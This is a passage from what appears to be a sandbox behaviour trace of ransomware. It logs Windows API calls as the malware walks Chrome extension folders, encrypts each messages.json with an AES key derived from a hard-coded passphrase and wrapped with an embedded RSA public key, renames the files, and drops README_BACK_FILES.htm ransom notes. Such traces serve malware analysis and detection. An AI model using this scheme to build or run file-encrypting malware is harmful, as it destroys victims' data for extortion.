Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.gsg")) returned 1 [0260.415] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.fuck")) returned 1 [0260.417] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0260.417] CryptDestroyKey (hKey=0x2e7c900) returned 1 [0260.417] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.417] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.417] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0260.417] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\readme_back_files.htm")) returned 0xffffffff [0260.417] AreFileApisANSI () returned 1 [0260.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.417] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.418] GetFileType (hFile=0x5d60) returned 0x1 [0260.418] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.419] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.419] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0260.419] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.419] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.419] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.420] GetLastError () returned 0x0 [0260.420] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json")) returned 0x20 [0260.420] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json", dwFileAttributes=0x80) returned 1 [0260.420] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.421] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.421] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.422] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.424] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.424] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.424] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.424] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7ce40) returned 1 [0260.424] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.424] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.424] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6f968) returned 1 [0260.425] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6f968, dwCertEncodingType=0x1, pInfo=0x2eb2700*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb2730*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb2738*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d280) returned 1 [0260.425] CryptEncrypt (in: hKey=0x2e7d280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.425] CryptEncrypt (in: hKey=0x2e7d280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e70490*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e70490*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.425] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e70490*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e70490*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.426] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0260.427] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x100, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0260.427] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0260.427] CloseHandle (hObject=0x5d64) returned 1 [0260.427] CloseHandle (hObject=0x5d5c) returned 1 [0260.427] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json"), bFailIfExists=0) returned 1 [0260.432] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json", dwFileAttributes=0x0) returned 1 [0260.432] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.gsg")) returned 1 [0260.433] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.fuck")) returned 1 [0260.434] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0260.434] CryptDestroyKey (hKey=0x2e7ce40) returned 1 [0260.434] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.434] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.434] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0260.434] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\readme_back_files.htm")) returned 0xffffffff [0260.434] AreFileApisANSI () returned 1 [0260.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.434] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.435] GetFileType (hFile=0x5d60) returned 0x1 [0260.435] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.436] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.436] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0260.436] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.437] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.437] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.437] GetLastError () returned 0x0 [0260.437] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json")) returned 0x20 [0260.437] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json", dwFileAttributes=0x80) returned 1 [0260.437] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.439] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.442] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.443] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.446] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.446] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.446] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.446] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7ce40) returned 1 [0260.446] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.446] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.446] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6f418) returned 1 [0260.446] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6f418, dwCertEncodingType=0x1, pInfo=0x2eb1ee0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb1f10*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb1f18*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d700) returned 1 [0260.447] CryptEncrypt (in: hKey=0x2e7d700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.447] CryptEncrypt (in: hKey=0x2e7d700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6fb00*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6fb00*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.448] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e6fb00*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6fb00*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.449] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x10f, lpOverlapped=0x0) returned 1 [0260.451] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x10f, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0260.451] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0260.451] CloseHandle (hObject=0x5d5c) returned 1 [0260.451] CloseHandle (hObject=0x5d64) returned 1 [0260.452] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json"), bFailIfExists=0) returned 1 [0260.455] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json", dwFileAttributes=0x0) returned 1 [0260.455] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.gsg")) returned 1 [0260.456] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.fuck")) returned 1 [0260.457] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0260.457] CryptDestroyKey (hKey=0x2e7ce40) returned 1 [0260.457] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.458] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.458] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0260.458] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\readme_back_files.htm")) returned 0xffffffff [0260.458] AreFileApisANSI () returned 1 [0260.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.458] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.459] GetFileType (hFile=0x5d60) returned 0x1 [0260.459] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.461] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.461] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0260.461] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.461] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.461] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.461] GetLastError () returned 